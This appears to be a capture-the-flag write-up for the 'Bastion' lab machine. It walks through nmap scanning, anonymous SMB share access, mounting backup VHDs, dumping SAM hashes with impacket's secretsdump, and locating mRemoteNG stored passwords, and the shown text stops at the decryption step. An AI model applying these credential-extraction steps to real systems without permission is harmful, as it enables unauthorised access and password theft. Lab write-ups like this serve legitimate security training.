Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-18 23:39 CEST Nmap scan report for 10.10.10.134 Host is up (0.027s latency). Not shown: 65522 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: -38m22s, deviation: 1h09m16s, median: 1m36s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2019-06-18T23:42:14+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-06-18 23:42:17 |_ start_date: 2019-06-18 23:22:10
From the output we can notice that the server is running Samba (smb).
To list all the shares we can use the command smbclient -L 10.10.10.134 typing an empty workgroup, which outputs:
1 2 3 4 5 6 7 8 9 10 11 12 13
Unable to initialize messaging context smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it Enter WORKGROUP\s41m0n's password:
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Backups Disk C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
Now we can try to access them (or mounting the share mount -t cifs \\10.10.10.134\Backups mountedBackup), figuring out that the can only access Backups and IPC$. Exploring the first one, we’re led to the folder WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351 which contains a bunch of xml files plus two vhd.
VHD (Virtual Hard Disk) is a file format which represents a virtual hard disk drive (HDD). It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders. It is typically used as the hard disk of a virtual machine.
By using the command virt-list-filesystems mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd provided by libguestfs, it is possible to see all the virtual hard disk partitions (in our case both have /dev/sda1).
Mount those vhd in a your temporary local directory: guestmount --add mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro ~/Desktop/mntpt1 -m /dev/sda1.
While the first one does not provide useful data, the second one is way more interesting: in fact we can try to explore the Windows directory in order to see if there is a SAM file, which suggests us that it can hopefully be cracked using also the SECURITY and SYSTEM files.
Once retrieved those files, we can use a script supplied by impacket to dump the possible passwords from our files:
1 2 3 4 5 6 7 8 9 10 11 12
$ python examples/secretsdump.py -sam ~/Desktop/SAM -security ~/Desktop/SECURITY -system ~/Desktop/SYSTEM LOCAL
For the root part we have to find a vulnerable service/program. By searching through the directories, we notice that mremoteng application is installed. This is a tool for password-management, whose bug in the previous version could allow to crack the password. It stores its data in the directory (in our case) C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml inside that xml file. In fact by opening it, it is possible to see that there are the hashed password.
Cracking them using that vulnerability is quite easy, we can use for example mremoteng-decrypt: